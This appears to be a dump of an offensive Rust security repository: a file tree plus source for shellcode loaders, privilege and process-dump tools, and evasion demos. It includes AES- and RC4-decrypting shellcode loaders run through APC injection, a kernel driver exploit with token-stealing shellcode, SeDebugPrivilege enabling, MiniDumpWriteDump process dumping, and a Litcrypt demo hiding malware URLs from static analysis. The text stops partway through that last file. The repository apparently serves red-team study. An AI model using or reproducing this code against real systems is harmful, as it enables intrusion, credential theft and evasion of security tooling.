├── .gitmodules ├── Allocate_With_Syscalls ├── Cargo.toml └── src │ └── main.rs ├── Create_DLL ├── Cargo.toml └── src │ └── lib.rs ├── DeviceIoControl ├── Cargo.toml └── src │ └── main.rs ├── EnableDebugPrivileges ├── Cargo.toml └── src │ └── main.rs ├── Execute_Without_Create_Process ├── Cargo.toml └── src │ └── main.rs ├── ImportedFunctionCall ├── Cargo.toml └── src │ └── main.rs ├── Injection_AES_Loader ├── Cargo.toml └── src │ └── main.rs ├── Injection_Rc4_Loader ├── Cargo.toml └── src │ └── main.rs ├── Kernel_Driver_Exploit ├── Cargo.toml └── src │ └── main.rs ├── Litcrypt_String_Encryption ├── Cargo.lock ├── Cargo.toml ├── README.md └── src │ └── main.rs ├── Named_Pipe_Client ├── Cargo.toml └── src │ └── main.rs ├── Named_Pipe_Server ├── Cargo.toml └── src │ └── main.rs ├── PEB_Walk ├── Cargo.lock ├── Cargo.toml └── src │ ├── main.rs │ └── types.rs ├── Process_Injection_CreateRemoteThread ├── Cargo.toml └── src │ └── main.rs ├── Process_Injection_CreateThread ├── Cargo.lock ├── Cargo.toml └── src │ └── main.rs ├── Process_Injection_Self_EnumSystemGeoID ├── Cargo.lock ├── Cargo.toml └── src │ └── main.rs ├── README.md ├── Shellcode_Local_inject ├── Cargo.toml └── src │ └── main.rs ├── UUID_Shellcode_Execution ├── Cargo.toml ├── bindings │ ├── Cargo.toml │ ├── build.rs │ └── src │ │ └── lib.rs └── src │ └── main.rs ├── Unhooking ├── Cargo.toml └── src │ └── main.rs ├── amsi_bypass ├── Cargo.toml └── src │ └── main.rs ├── apihooking ├── Cargo.toml └── src │ └── main.rs ├── asm_syscall ├── Cargo.toml └── src │ └── main.rs ├── base64_system_enum ├── Cargo.toml └── src │ └── main.rs ├── bindings.rs ├── cargo.toml ├── http-https-requests ├── Cargo.toml └── src │ └── main.rs ├── keyboard_hooking ├── Cargo.toml └── src │ └── main.rs ├── memN0ps ├── arsenal-rs │ ├── LICENSE │ ├── README.md │ ├── dll_injector_classic-rs │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ ├── README.md │ │ ├── inject │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ │ └── main.rs │ │ ├── injected.png │ │ └── testdll │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ └── lib.rs │ ├── module_stomping-rs │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ ├── README.md │ │ ├── injection.png │ │ ├── procmon.png │ │ ├── src │ │ │ └── main.rs │ │ ├── thread.png │ │ └── windbg.png │ ├── obfuscate_shellcode-rs │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ └── src │ │ │ └── main.rs │ ├── process_hollowing-rs │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ ├── README.md │ │ ├── detection.png │ │ └── src │ │ │ └── main.rs │ ├── rdi-rs │ │ ├── .gitattributes │ │ ├── .gitignore │ │ ├── LICENSE │ │ ├── README.md │ │ ├── inject │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ │ └── main.rs │ │ └── reflective_loader │ │ │ ├── .gitignore │ │ │ ├── Cargo.toml │ │ │ └── src │ │ │ ├── lib.rs │ │ │ └── loader.rs │ └── shellcode_runner_classic-rs │ │ ├── .gitattributes │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ ├── Detections.PNG │ │ ├── PoC.PNG │ │ ├── README.md │ │ └── src │ │ └── main.rs ├── eagle-rs │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── README.md │ ├── client │ │ ├── Cargo.toml │ │ └── src │ │ │ ├── kernel_interface.rs │ │ │ └── main.rs │ ├── cmd_hide1.png │ ├── cmd_hide2.png │ ├── common │ │ ├── Cargo.toml │ │ └── src │ │ │ └── lib.rs │ ├── driver │ │ ├── .cargo │ │ │ └── config.toml │ │ ├── Cargo.toml │ │ ├── Makefile.toml │ │ ├── build.rs │ │ └── src │ │ │ ├── callbacks │ │ │ └── mod.rs │ │ │ ├── dse │ │ │ └── mod.rs │ │ │ ├── includes │ │ │ └── mod.rs │ │ │ ├── lib.rs │ │ │ ├── process │ │ │ ├── hide.rs │ │ │ ├── memory.rs │ │ │ └── mod.rs │ │ │ ├── string │ │ │ └── mod.rs │ │ │ └── token │ │ │ └── mod.rs │ ├── notepad_protect.png │ └── notepad_unprotect.png ├── ekko-rs │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── README.md │ └── src │ │ ├── ekko.rs │ │ └── main.rs ├── mimiRust │ ├── .cargo │ │ └── config │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── README.md │ ├── demo.gif │ └── src │ │ ├── lateral_movement │ │ ├── kerberos │ │ │ └── mod.rs │ │ ├── mod.rs │ │ ├── pth │ │ │ └── mod.rs │ │ └── scm │ │ │ └── mod.rs │ │ ├── main.rs │ │ ├── passwords │ │ ├── mod.rs │ │ ├── ntlm │ │ │ └── mod.rs │ │ └── wdigest │ │ │ └── mod.rs │ │ ├── privilege │ │ └── mod.rs │ │ └── utilities │ │ └── mod.rs ├── mmapper-rs │ ├── LICENSE │ ├── README.md │ ├── loader │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ └── src │ │ │ ├── lib.rs │ │ │ └── main.rs │ └── testdll │ │ ├── Cargo.toml │ │ └── src │ │ └── lib.rs ├── mordor-rs │ ├── .gitattributes │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ ├── blackgate.png │ ├── freshycalls_syswhispers │ │ ├── Cargo.toml │ │ ├── src │ │ │ ├── lib.rs │ │ │ ├── obf.rs │ │ │ ├── syscall.rs │ │ │ └── syscall_resolve.rs │ │ └── tests │ │ │ └── syscaller.rs │ ├── hells_halos_tartarus_gate │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ └── src │ │ │ └── lib.rs │ ├── hooking.png │ ├── syswhisper2_example1.PNG │ └── syswhisper2_example2.PNG ├── pemadness-rs │ ├── .gitattributes │ ├── .gitignore │ ├── .vscode │ │ └── launch.json │ ├── LICENSE │ ├── README.md │ └── pemadness │ │ ├── Cargo.toml │ │ └── src │ │ └── lib.rs ├── psyscalls-rs │ ├── LICENSE │ ├── README.md │ ├── ntdll.png │ └── parallel_syscalls │ │ ├── .gitignore │ │ ├── Cargo.toml │ │ └── src │ │ ├── main.rs │ │ └── parallel_syscalls.rs └── srdi-rs │ ├── .gitattributes │ ├── .gitignore │ ├── Cargo.toml │ ├── LICENSE │ ├── Makefile.toml │ ├── README.md │ ├── generate_shellcode │ ├── Cargo.toml │ └── src │ │ └── main.rs │ ├── hash_calculator │ ├── Cargo.toml │ └── src │ │ └── main.rs │ ├── inject │ ├── Cargo.toml │ └── src │ │ └── main.rs │ ├── reflective_loader │ ├── .gitignore │ ├── Cargo.toml │ └── src │ │ └── lib.rs │ ├── sRDI.png │ └── testdll │ ├── Cargo.toml │ └── src │ └── lib.rs ├── memfd_create ├── .gitignore ├── Cargo.toml ├── README.md └── src │ ├── bar.c │ └── main.rs ├── offensiverust.png ├── patch_etw ├── Cargo.toml └── src │ └── main.rs ├── ppid_spoof ├── Cargo.toml └── src │ └── main.rs ├── tcp_ssl_client ├── Cargo.toml └── src │ └── main.rs ├── tcp_ssl_server ├── Cargo.toml └── src │ └── main.rs ├── token_manipulation ├── Cargo.toml └── src │ └── main.rs └── wmi_execute ├── Cargo.toml └── src └── main.rs /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "memN0ps/eagle-rs"] 2 | path = memN0ps/eagle-rs 3 | url = git@github.com:memN0ps/eagle-rs.git 4 | [submodule "memN0ps/arsenal-rs"] 5 | path = memN0ps/arsenal-rs 6 | url = git@github.com:memN0ps/arsenal-rs.git 7 | [submodule "memN0ps/psyscalls-rs"] 8 | path = memN0ps/psyscalls-rs 9 | url = git@github.com:memN0ps/psyscalls-rs.git 10 | [submodule "memN0ps/mmapper-rs"] 11 | path = memN0ps/mmapper-rs 12 | url = git@github.com:memN0ps/mmapper-rs.git 13 | [submodule "memN0ps/srdi-rs"] 14 | path = memN0ps/srdi-rs 15 | url = git@github.com:memN0ps/srdi-rs.git 16 | [submodule "memN0ps/mordor-rs"] 17 | path = memN0ps/mordor-rs 18 | url = git@github.com:memN0ps/mordor-rs.git 19 | [submodule "memN0ps/mimiRust"] 20 | path = memN0ps/mimiRust 21 | url = git@github.com:memN0ps/mimiRust.git 22 | [submodule "memN0ps/pemadness-rs"] 23 | path = memN0ps/pemadness-rs 24 | url = git@github.com:memN0ps/pemadness-rs.git 25 | -------------------------------------------------------------------------------- /Allocate_With_Syscalls/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Allocate_With_Syscalls" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | ntapi = "0.3.6" 10 | -------------------------------------------------------------------------------- /Allocate_With_Syscalls/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate ntapi; 2 | use ntapi::ntmmapi::NtAllocateVirtualMemory; 3 | use ntapi::ntpsapi::NtCurrentProcess; 4 | use std::ptr::null_mut; 5 | use ntapi::winapi::ctypes::c_void; 6 | 7 | fn main() { 8 | 9 | unsafe { 10 | let mut allocstart : *mut c_void = null_mut(); 11 | let mut seize : usize = 150; 12 | NtAllocateVirtualMemory(NtCurrentProcess,&mut allocstart,0,&mut seize, 0x00003000, 0x40); 13 | } 14 | 15 | } 16 | -------------------------------------------------------------------------------- /Create_DLL/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Create_DLL" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = { version = "0.3.9", features = ["minwindef","winuser"] } 10 | 11 | [lib] 12 | crate-type = ["cdylib"] 13 | -------------------------------------------------------------------------------- /Create_DLL/src/lib.rs: -------------------------------------------------------------------------------- 1 | #![cfg(windows)] 2 | use std::ptr::null_mut; 3 | use winapi::um::winuser::MessageBoxA; 4 | 5 | #[no_mangle] 6 | #[allow(non_snake_case, unused_variables)] 7 | 8 | pub extern "C" fn popit() { 9 | unsafe {MessageBoxA(null_mut(),"Rust DLL Test\0".as_ptr() as *const i8,"Rust DLL Test\0".as_ptr() as *const i8,0x00004000);} 10 | } 11 | 12 | 13 | //#[no_mangle] 14 | //#[allow(non_snake_case, unused_variables)] 15 | // fn DllMain( 16 | // dll_module: HINSTANCE, 17 | // call_reason: DWORD, 18 | // reserved: LPVOID) 19 | // -> BOOL 20 | // { 21 | // const DLL_PROCESS_ATTACH: DWORD = 1; 22 | // const DLL_PROCESS_DETACH: DWORD = 0; 23 | 24 | // match call_reason { 25 | // DLL_PROCESS_ATTACH => popit(), 26 | // DLL_PROCESS_DETACH => (), 27 | // _ => () 28 | // } 29 | // TRUE 30 | // } 31 | -------------------------------------------------------------------------------- /DeviceIoControl/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "DeviceIoControl" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features=["fileapi", "ioapiset"]} 10 | -------------------------------------------------------------------------------- /DeviceIoControl/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate winapi; 2 | use winapi::um::fileapi::CreateFileA; 3 | use winapi::um::ioapiset::DeviceIoControl; 4 | use std::ptr::null_mut; 5 | 6 | fn main() { 7 | unsafe { 8 | trigger(); 9 | } 10 | } 11 | 12 | unsafe fn trigger() { 13 | let filename = r"\\.\ADevice\0"; 14 | let fd = CreateFileA(filename.as_ptr() as _, 0xC0000000, 0, null_mut(), 0x3, 0, null_mut()); 15 | let mut data = vec![b'A'; 2080]; 16 | DeviceIoControl(fd, 0x222000, data.as_ptr() as _, data.len() as _, null_mut(), 0, &mut 0, null_mut()); 17 | } 18 | 19 | -------------------------------------------------------------------------------- /EnableDebugPrivileges/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "EnableDebugPrivileges" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features =["processthreadsapi","winnt","winbase","securitybaseapi"]} 10 | -------------------------------------------------------------------------------- /EnableDebugPrivileges/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate winapi; 2 | use winapi::um::processthreadsapi::{OpenProcessToken,GetCurrentProcess}; 3 | use winapi::um::winnt::{HANDLE,TOKEN_ADJUST_PRIVILEGES,TOKEN_QUERY,LUID_AND_ATTRIBUTES,SE_PRIVILEGE_ENABLED,TOKEN_PRIVILEGES}; 4 | use std::ptr::null_mut; 5 | use std::mem::size_of; 6 | use winapi::shared::ntdef::LUID; 7 | use winapi::um::securitybaseapi::AdjustTokenPrivileges; 8 | use winapi::um::winbase::LookupPrivilegeValueA; 9 | 10 | fn main() { 11 | unsafe{ 12 | let mut h_token: HANDLE = 0 as _; 13 | OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&mut h_token); 14 | let privs = LUID_AND_ATTRIBUTES {Luid: LUID { LowPart: 0, HighPart: 0,},Attributes: SE_PRIVILEGE_ENABLED,}; 15 | let mut tp = TOKEN_PRIVILEGES {PrivilegeCount: 1,Privileges: [privs ;1],}; 16 | let privilege = "SeDebugPrivilege\0"; 17 | let _ = LookupPrivilegeValueA(null_mut(),privilege.as_ptr() as *const i8,&mut tp.Privileges[0].Luid,); 18 | let _ = AdjustTokenPrivileges(h_token,0,&mut tp,size_of::() as _,null_mut(),null_mut()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Execute_Without_Create_Process/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Execute_Without_Create_Process" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | -------------------------------------------------------------------------------- /Execute_Without_Create_Process/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::process::Command; 2 | 3 | fn main() { 4 | //executes process via cmd in the same process context with .output 5 | if let Ok(command) = Command::new("cmd").arg("/c").arg("dir").output() { 6 | println!("{}",String::from_utf8_lossy(&command.stdout)) 7 | } 8 | //Spawns a new process with .spawn 9 | Command::new("notepad").spawn(); 10 | } 11 | -------------------------------------------------------------------------------- /ImportedFunctionCall/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "ImportedFunctionCall" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | kernel32-sys = "0.2.2" 10 | winapi = {version = "0.3.9", features =["processthreadsapi","winnt", "fileapi"]} 11 | -------------------------------------------------------------------------------- /ImportedFunctionCall/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate winapi; 2 | extern crate kernel32; 3 | use winapi::um::processthreadsapi::{OpenProcess,GetCurrentProcess}; 4 | use winapi::um::fileapi::{CreateFileA,CREATE_ALWAYS}; 5 | use winapi::um::winnt::{PROCESS_ALL_ACCESS,GENERIC_ALL,FILE_ATTRIBUTE_NORMAL,HANDLE}; 6 | use std::ptr::null_mut; 7 | 8 | 9 | fn main() { 10 | 11 | unsafe { 12 | let minidump: extern "stdcall" fn(HANDLE, u32, HANDLE, u32,*const (),*const (),*const ()); 13 | let hndls = OpenProcess(PROCESS_ALL_ACCESS,0,1234); 14 | let modu = "dbghelp.dll\0"; 15 | let handle = kernel32::LoadLibraryA(modu.as_ptr() as *const i8); 16 | let mthd = "MiniDumpWriteDump\0"; 17 | let mini = kernel32::GetProcAddress(handle, mthd.as_ptr() as *const i8); 18 | minidump = std::mem::transmute(mini); 19 | let path = "C:\\Users\\Public\\test.dmp\0"; 20 | let fd = CreateFileA(path.as_ptr() as _,GENERIC_ALL,0,null_mut(),CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,null_mut()); 21 | minidump(GetCurrentProcess(),1234,fd,0x00000002,null_mut(),null_mut(),null_mut()) 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Injection_AES_Loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Injection_AES_Loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | ntapi = "0.3.6" 10 | reqwest = {version = "0.11.4", features = ["blocking"]} 11 | winapi = {version = "0.3.9", features = ["wincon"]} 12 | libaes = "0.6.1" 13 | -------------------------------------------------------------------------------- /Injection_AES_Loader/src/main.rs: -------------------------------------------------------------------------------- 1 | #![cfg(windows)] 2 | use ntapi::ntmmapi::{NtAllocateVirtualMemory,NtWriteVirtualMemory}; 3 | use ntapi::ntpsapi::{NtCurrentProcess,NtCurrentThread,NtQueueApcThread,NtTestAlert,PPS_APC_ROUTINE}; 4 | use std::ptr::null_mut; 5 | use ntapi::winapi::ctypes::c_void; 6 | use libaes::Cipher; 7 | 8 | fn main(){ 9 | unsafe {winapi::um::wincon::FreeConsole();}; 10 | let key : [u8;16] = [0x81, 0x5, 0x8b, 0x53, 0xfc, 0xd4, 0x5d, 0xc8, 0x55, 0xf7, 0xf0, 0xf7, 0x44, 0x4d, 0x88, 0xdb]; 11 | let shellcode : [u8;1] = [0x70]; 12 | let iv = b"This is 16 bytes"; 13 | let cipher = Cipher::new_128(&key); 14 | let decrypted = cipher.cbc_decrypt(iv, &shellcode[..]); 15 | unsafe { 16 | let mut allocstart : *mut c_void = null_mut(); 17 | let mut seize : usize = decrypted.len(); 18 | NtAllocateVirtualMemory(NtCurrentProcess,&mut allocstart,0,&mut seize, 0x00003000, 0x40); 19 | NtWriteVirtualMemory(NtCurrentProcess,allocstart,decrypted.as_ptr() as _,decrypted.len() as usize,null_mut()); 20 | NtQueueApcThread(NtCurrentThread,Some(std::mem::transmute(allocstart)) as PPS_APC_ROUTINE,allocstart,null_mut(),null_mut()); 21 | NtTestAlert(); 22 | } 23 | } 24 | 25 | -------------------------------------------------------------------------------- /Injection_Rc4_Loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rc4_encode" 3 | version = "0.1.0" 4 | edition = "2021" 5 | author = "n00b" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [dependencies] 10 | ntapi = "0.3.6" 11 | reqwest = {version = "0.11.4", features = ["blocking"]} 12 | winapi = {version = "0.3.9", features = ["wincon"]} 13 | libaes = "0.6.1" 14 | rust-crypto = "0.2.34" 15 | 16 | 17 | [profile.release] 18 | lto = true -------------------------------------------------------------------------------- /Injection_Rc4_Loader/src/main.rs: -------------------------------------------------------------------------------- 1 | #![cfg(windows)] 2 | extern crate crypto; 3 | 4 | use crypto::symmetriccipher::SynchronousStreamCipher; 5 | use ntapi::ntmmapi::{NtAllocateVirtualMemory,NtWriteVirtualMemory}; 6 | use ntapi::ntpsapi::{NtCurrentProcess,NtCurrentThread,NtQueueApcThread,NtTestAlert,PPS_APC_ROUTINE}; 7 | use std::ptr::null_mut; 8 | use ntapi::winapi::ctypes::c_void; 9 | 10 | fn main() { 11 | let test : [u8;276] = 12 | [0x76, 0xc2, 0xd1, 0x96, 0xf1, 0x2a, 0x8a, 0xb9, 0xb6, 0xa0, 0x1d, 0x88, 0xb6, 0xde, 0xab, 0x36, 0x9a, 0x5f, 0x68, 0x35, 0x99, 0x91, 0x2e, 0x3a, 0x72, 0x57, 0xaa, 0x8f, 0xce, 0x9d, 0xea, 0xc6, 0x80, 0xe6, 0x43, 0xc7, 0xf3, 0xf2, 0x5b, 0x00, 0x85, 0xa7, 0xc5, 0x23, 0x2f, 0xd9, 0x97, 0xcb, 0x37, 0x9a, 0xe4, 0xf8, 0x5f, 0x55, 0xe5, 0xff, 0x52, 0x0d, 0x59, 0xe5, 0xfe, 0x20, 0x88, 0x6f, 0x1f, 0xd2, 0xf8, 0x94, 0x24, 0x44, 0x0c, 0x5c, 0xd5, 0xb1, 0x57, 0x02, 0xd0, 0x8b, 0xf2, 0x16, 0x3c, 0x28, 0xda, 0xd5, 0x21, 0x35, 0xc2, 0x63, 0x59, 0x43, 0xed, 0xcb, 0x93, 0xd1, 0x35, 0x5b, 0x98, 0x78, 0xd4, 0x28, 0xe7, 0x7d, 0xf3, 0x05, 0xb2, 0xda, 0xaf, 0x95, 0x3c, 0x3a, 0xfb, 0xb6, 0xb7, 0x7a, 0xc8, 0x4e, 0x18, 0xec, 0x28, 0xce, 0x81, 0x5a, 0x32, 0xbc, 0xa5, 0xa0, 0xf9, 0xd1, 0x82, 0xdc, 0xc0, 0x4d, 0xf7, 0x39, 0xf3, 0x3d, 0x05, 0x46, 0x9a, 0xf0, 0xac, 0xa4, 0x88, 0xe8, 0xd4, 0xfe, 0x26, 0xe4, 0xba, 0xb5, 0xf2, 0x81, 0xfe, 0xfc, 0x4d, 0xa0, 0x16, 0xe5, 0xfb, 0xae, 0x84, 0xd0, 0xa9, 0xde, 0xd2, 0x16, 0xb9, 0x4e, 0x5f, 0xe0, 0xf2, 0x1b, 0x10, 0x68, 0x5f, 0x82, 0xab, 0x81, 0x9b, 0xd1, 0xec, 0x2f, 0x50, 0x20, 0x6e, 0x34, 0x2b, 0x01, 0xac, 0xd9, 0x90, 0x75, 0xa3, 0x85, 0x83, 0x8b, 0x5e, 0x46, 0xff, 0xee, 0x28, 0x92, 0x4f, 0xd2, 0xe3, 0x32, 0x58, 0x2e, 0x71, 0xbd, 0x1f, 0x2e, 0xa9, 0xc1, 0x65, 0xe5, 0x3d, 0x48, 0x53, 0xd0, 0xbb, 0x06, 0x90, 0x1f, 0x1e, 0xa1, 0xb9, 0x8c, 0x13, 0x2d, 0x53, 0x36, 0x5a, 0x1f, 0x7a, 0xa8, 0xf9, 0x78, 0xf2, 0x39, 0xa2, 0x10, 0x05, 0x13, 0xae, 0xf6, 0xf1, 0x97, 0xed, 0x81, 0x90, 0xa5, 0xb9, 0x7b, 0x6b, 0x09, 0x36, 0x6f, 0x8a, 0x43, 0x07, 0xe6, 0xa7, 0xa0, 0xc0, 0x46, 0x41, 0xc1, 0xc9, 0xcc, 0x8d, 0x0e, 0x44, 0x0c, 0x6c, 0x1b]; 13 | 14 | let mut cipher = crypto::rc4::Rc4::new("I_AM_A_KEY".as_bytes()); 15 | let mut o = test.clone(); 16 | cipher.process(&test[..], &mut o); 17 | unsafe { 18 | let mut allocstart : *mut c_void = null_mut(); 19 | let mut seize : usize = o.len(); 20 | NtAllocateVirtualMemory(NtCurrentProcess,&mut allocstart,0,&mut seize, 0x00003000, 0x40); 21 | NtWriteVirtualMemory(NtCurrentProcess,allocstart,o.as_ptr() as _,o.len() as usize,null_mut()); 22 | NtQueueApcThread(NtCurrentThread,Some(std::mem::transmute(allocstart)) as PPS_APC_ROUTINE,allocstart,null_mut(),null_mut()); 23 | NtTestAlert(); 24 | } 25 | } -------------------------------------------------------------------------------- /Kernel_Driver_Exploit/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "Kernel_Driver_Exploit" 3 | version = "0.1.0" 4 | edition = "2018" 5 | authro = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features=["fileapi", "ioapiset", "memoryapi"]} 10 | -------------------------------------------------------------------------------- /Kernel_Driver_Exploit/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate winapi; 2 | use winapi::um::fileapi::CreateFileA; 3 | use winapi::um::memoryapi::VirtualAlloc; 4 | use winapi::um::ioapiset::DeviceIoControl; 5 | use std::ptr::null_mut; 6 | use std::process::Command; 7 | 8 | //Cargo.toml : winapi = {version = "0.3.7", features=["fileapi", "ioapiset", "memoryapi"]} 9 | fn main() { 10 | unsafe { 11 | exploit(); 12 | } 13 | Command::new("cmd.exe").status().expect("failed :/"); 14 | } 15 | 16 | unsafe fn exploit() { 17 | let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00"; 18 | let filename = r"\\.\Device\0"; 19 | let fd = CreateFileA(filename.as_ptr() as _, 0xC0000000, 0, null_mut(), 0x3, 0, null_mut()); 20 | let alloc = VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40) as *mut u8; 21 | alloc.copy_from(shellcode.as_ptr() as *mut u8, shellcode.len()); 22 | let mut data = vec![b'A'; 2080]; 23 | let bytes = (alloc as usize).to_le_bytes(); 24 | data.extend_from_slice(&bytes); 25 | DeviceIoControl(fd, 0x222000, data.as_ptr() as _, data.len() as _, null_mut(), 0, &mut 0, null_mut()); 26 | } 27 | -------------------------------------------------------------------------------- /Litcrypt_String_Encryption/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | version = 3 4 | 5 | [[package]] 6 | name = "litcrypt" 7 | version = "0.3.0" 8 | source = "registry+https://github.com/rust-lang/crates.io-index" 9 | checksum = "5f82f92066d9d41b3a569b459b7874e67feb835507a83b7bd142ea9f56c620c7" 10 | dependencies = [ 11 | "proc-macro2", 12 | "quote", 13 | ] 14 | 15 | [[package]] 16 | name = "litcrypt_demo" 17 | version = "0.1.0" 18 | dependencies = [ 19 | "litcrypt", 20 | ] 21 | 22 | [[package]] 23 | name = "proc-macro2" 24 | version = "1.0.36" 25 | source = "registry+https://github.com/rust-lang/crates.io-index" 26 | checksum = "c7342d5883fbccae1cc37a2353b09c87c9b0f3afd73f5fb9bba687a1f733b029" 27 | dependencies = [ 28 | "unicode-xid", 29 | ] 30 | 31 | [[package]] 32 | name = "quote" 33 | version = "1.0.17" 34 | source = "registry+https://github.com/rust-lang/crates.io-index" 35 | checksum = "632d02bff7f874a36f33ea8bb416cd484b90cc66c1194b1a1110d067a7013f58" 36 | dependencies = [ 37 | "proc-macro2", 38 | ] 39 | 40 | [[package]] 41 | name = "unicode-xid" 42 | version = "0.2.2" 43 | source = "registry+https://github.com/rust-lang/crates.io-index" 44 | checksum = "8ccb82d61f80a663efe1f787a51b16b5a51e3314d6ac365b08639f52387b33f3" 45 | -------------------------------------------------------------------------------- /Litcrypt_String_Encryption/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "litcrypt_demo" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | litcrypt = "0.3" -------------------------------------------------------------------------------- /Litcrypt_String_Encryption/README.md: -------------------------------------------------------------------------------- 1 | # [Litcrypt](https://github.com/anvie/litcrypt.rs) 2 | This one takes some explanation. 3 | 4 | During the OffensiveNotion dev process, Taggart and I found the Litcrypt crate useful in encrypting the literal strings of our agent binary both at rest and in memory. Litcrypt encrypts strings and decrypts them only when they are used. This is useful to conceal strings and retain OPSEC during operations. 5 | 6 | ## How To 7 | Litcrypt needs an environment variable set in order to encrypt the strings during compilation. You can set this by entering the following in Linux: 8 | 9 | ``` 10 | $ export LITCRYPT_ENCRYPT_KEY="OffensiveRustRules" 11 | ``` 12 | Then, reopen Visual Studio Code and the Rust Analyzer will recognize that Litcrypt is in use: 13 | ``` 14 | $ code . 15 | ``` 16 | 17 | Once that env var is set, it's as simple as the usual `cargo build`. You will get a gross error message if the encryption key can't be applied from the env var. 18 | 19 | Then, run strings against the binary and look at the ones that show up and the ones that don't. 20 | 21 | -------------------------------------------------------------------------------- /Litcrypt_String_Encryption/src/main.rs: -------------------------------------------------------------------------------- 1 | #[macro_use] 2 | extern crate litcrypt; 3 | 4 | // Call the litcrypt method first... 5 | use_litcrypt!(); 6 | 7 | fn main(){ 8 | 9 | let payload_url: String = "http://fancyladsnacks.local/definitelymalware.exe".to_string(); 10 | let evil_password: String = "OhNoPayUsBitcoin!@#".to_string(); 11 | 12 | // If I want to encrypt a literal string, I can use the lc!() macro. This and the use_litcrypt() method will encrypt anything that is passed as the argument. 13 | let _can_you_see_me: String = lc!("Can you see me?"); 14 | // You will not see the above string in the bin once it is compiled. You WILL see this one, because we aren't using the lc!() macro: 15 | let _or_can_you_see_me: String = "Or can you see me?".to_string(); 16 | 17 | println!("[!] Unencrypted Strings:"); 18 | 19 | println!("\t[*] Downloading evil thing from {}", payload_url); 20 | println!("\t[*] Encrypting all ur filez with password: {}", evil_password); 21 | println!("\t[-] These strings appear in the binary statically. Run strings and grep for them, they are in there."); 22 | 23 | println!("\n[!] Encrypted Strings using the lc! macro:"); 24 | 25 | println!("\t[*] Downloading evil thing from: {}", lc!("http://freetshirts.info.local/superevilthingmuhahahaha.exe")); 26 | println!("\t[*] Encrypting all ur filez with password: {}", lc!("ThisIsTheEncryptionKeyToYourData123!@#")); 27 | println!("\t[+] The evil URL and password strings are encrypted and don't appear statically in the binary! They also don't appear in memory until they are used. Run strings and grep for the URL and encryption key to check"); 28 | 29 | 30 | println!("\n[?] Can I define variables and encrypt them using Litcrypt?\n[A] Nope! You can't use litcrypt 